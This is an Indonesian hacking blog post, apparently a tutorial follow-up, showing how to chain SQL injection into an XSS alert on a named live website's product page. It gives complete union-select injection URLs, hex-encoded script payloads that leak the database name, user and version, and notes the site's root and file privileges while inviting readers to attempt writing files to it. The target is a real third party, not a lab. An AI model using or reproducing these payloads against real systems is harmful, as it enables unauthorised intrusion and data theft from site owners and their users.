-
Hai Sobat.
Saya ikal
Disini, saya akan share cara melakukan SQL Injection To XSS print basic statement in alert.
-
Di artikel ini, hanya sambungan atau lanjutan dari artikel sebelumnya jadi bagi yang belum melihat artikel sebelumnya silakan klik SQL Injection To XSS
Target masih sama, dan disini kita hanya mencoba print basic statement di alert XSS nya. Contohnya seperti ini.
Nah seperti itu. Disitu terlihat kata Injected By 1K4lL_* lalu tanda | sebagai pemisah antar jarak lalu nama database lalu tanda pemisah lalu nama user dan tanda pemisah lagi dan lalu versi yang terpakai dari website tersebut.
Btw, website nya memiliki user root@localhost dan user privilage yes dan file_priv mendapatkan Y.
Bagi yang ingin melakukan SQL Into Outfile silahkan di coba yah hehe. Bagi yang belum tau atau belum mengenal SQL Into Outfile silahkan baca artikel ini Cara melakukan SQL Into Outfile.
Langsung saja, di artikel sebelumnya kita mendapat batas column di angka 147 dan mendapatkan angka togel 4,32,78,79,91,92,93,94,95,96,97.
http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -
Saya akan mencoba print di angka 4 dengan code xss seperti ini :
concat(<script>alert('Injected By 1K4lL_* |,database(),|,user(),|,version(),|,');</script>)
Lalu bagaimana mengconvert nya? Apakah semua nya di convert atau di encode menjadi hex? tidak.
Bagian-bagian yang di convert atau di encode menjadi hex hanyalah bagian yang bukan perintah SQL atau apalah :'v. Jadi bagian database() user() version() tidak perlu di encode. Dan setiap encode di batasi dengan tanda koma (,) agar terbaca oleh server. Dan di beri 0x sebelum encode an nya.
Contoh bagian yang di encode :
1).<script>alert('Injected By 1K4lL_* |
Encode menjadi hex :
0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0
2). |
Encode menjadi hex :
0x207c20
3). |
Encode menjadi hex :
0x207c20
4). |
Encode menjadi hex :
0x207c20
5).');</script>
Encode menjadi hex :
0x27293b3c2f7363726970743e
Dan mari kita satukan dan bungkus dengan concat. Maka menjadi :
concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0,database(),0x207c20,user(),0x207c20,version(),0x207c20,0x27293b3c2f7363726970743e)
Dan taruh concat tersebut di angka togel.
http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0,database(),0x207c20,user(),0x207c20,version(),0x207c20,0x27293b3c2f7363726970743e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -
Maka basic statement dan nick pun akan terprint di dalam alert. Bukan di page website.
Yah mungkin segini ae dh. Masih ada lanjutannya nnti. Next artikel saya akan buat SQL to XSS dump database in alert.
Thanks
See u
